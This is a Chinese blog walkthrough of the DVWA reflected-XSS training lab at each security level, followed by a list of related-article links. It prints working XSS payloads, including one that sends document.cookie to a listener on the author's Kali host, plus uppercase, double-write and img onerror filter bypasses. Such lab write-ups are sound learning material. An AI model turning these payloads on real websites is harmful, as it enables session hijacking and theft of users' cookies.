DVWA 反射型XSS XSS(Reflected)题解
low
首先输入最基础的
<script>alert(“1”)</script>
发现弹窗成功.
重置数据库,试一下能不能爆出cookie。
<script>alert(“document.cookie”)</script>
之后使用burp看一下数据包
发现其中的Cookie与爆出来的相同,证明爆出来的确实是Cookie
开个kali的nc监听一下
之后在靶场输入
<script>new Image().src="http://192.168.92.128/a.php?cookie="+document.cookie;</script>
执行后可以在kali处看到返回的cookie
medium
首先试一下最基本的alert1:
毫无反应,甚至alert(“1”)作为用户名打了出来
点击网页右下角View Source按钮查看源码。
这里可以发现安全策略为:
将输入中的script(nnd,这里被安全屏蔽了,左右括号打不出来)替换为空,那么针对这个安全策略,可以有以下几种方法:
1 大写绕过
<SCRIPT>alert(“1”)</script>
2 双写绕过
<scr<script>ipt>alert(“1”)</script>
3 使用其他标签
<img src=1 onerror=alert(document.cookie)>
这句是向src所记录的路由申请资源,若出错则执行onerror
此处我还实验了’<’和’>’符号的转义,遗憾的是没有成功
high
打开源码,可以看到源码对script使用正则进行了严格限制,medium阶段所使用的大写与双写绕过均作废了。只好使用其他标签进行漏洞利用
<body onload=alert(“1”)>
impossible
看眼源码,将输入进行了html实体转义,甚至防住了CSRF攻击。
DVWA 反射型XSS XSS(Reflected)题解相关推荐
- DVWA靶机-反射性XSS漏洞(Reflected)
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command I ...
- DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...
- DVWA学习之XSS(跨站脚本攻击)(超级详细)
DVWA学习之XSS XSS 跨站脚本攻击 0x01 XSS(Cross Site Script)简介 0x02 何为XSS 0x03 XSS存在的原因 0x04 XSS漏洞的危害 0x05 XSS ...
- java http url xss,XSS简介
XSS跨站脚本攻击(Cross Site Scripting),是将Java script代码插入web页面中,之后当用户浏览页面时, 会执行嵌套在web页面里面的Java script代码,从而达到 ...
- php伪协议xss,XSS漏洞学习
XSS漏洞的原理 XSS漏洞是发生在目标网站中目标用户的浏览层面上,当用户浏览器渲染整个HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就会发生. XSS漏洞的危害 获取用户或者管理员的 ...
- DVWA关卡11:Reflected Cross Site Scripting (XSS)(反射型XSS)
目录 Low Medium High Impossible 反射型XSS:恶意脚本未经转义被直接输入并作为HTML输出的一部分,恶意脚本不在后台存储,直接在前端浏览器被执行. 攻击者可以使用XSS向恶 ...
- DVWA 之 XSS(Reflected)反射型XSS
目录 1.级别:Low 2.级别:Medium 3.级别:High 4.级别:Impossible 反射型XSS攻击 又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS.漏洞产生的原因是攻击者注入 ...
- dvwa中的xss(跨站脚本)攻击
环境: dvwa: 192.168.11.135 dvwa版本: Version 1.9 (Release date: 2015-09-19) kail机器:192.168.11.156 一.XSS是 ...
- DVWA之Stored XSS(存储型XSS)代码审计
目录 Low Medium Hight Impossible Low 关键源码 trim(string,charlist) : 移除string字符两侧的预定义字符,预定义字符包括\t . \n .\ ...
最新文章
- ubuntu 挂载 exfat 格式 U盘 mount:unknown filesystem type ‘exfat‘
- python 面板数据分析_科学网—Python中的结构化数据分析利器-Pandas简介 - 郑俊娟的博文...
- 872.叶子相似的树
- Design Pattern - Adapter(C#)
- vue为p标签_通过vue.js几个基本操作,理解一下什么是插槽「606」
- mysql主从同步忽略一条错误_mysql主从同步出现异常语句跳过错误处理
- mysql注入式攻击_mybatis的sql中使用$会出现sql注入示例
- Java 并发系列之十一:并发线程带来的风险
- inputstreamreader未关闭会导致oom_【搞定面试官】你还在用Executors来创建线程池?会有什么问题呢?
- bigdata learning unit two--Spark environment setting
- 阿佐数据分析python小抄【pandas基础数据处理】
- 计算机编程常用术语英文词汇
- SLAM领域著名实验室及大牛、SLAM领域大佬(不定期更新)
- linux 7.5防火墙配置,Centos7.5 firewalld防火墙配置
- 解析ICMAX国产存储芯片eMMC和UFS的区别
- antv,图表和地图
- 异动分析(一)如何快速进行异常定位
- 前端优化——前端面试
- 腾讯云「邮件证书」重磅发布!从此告别邮件安全漏洞
- mysql 执行错误1395_主义 - 常规错误:1395无法删除连接视图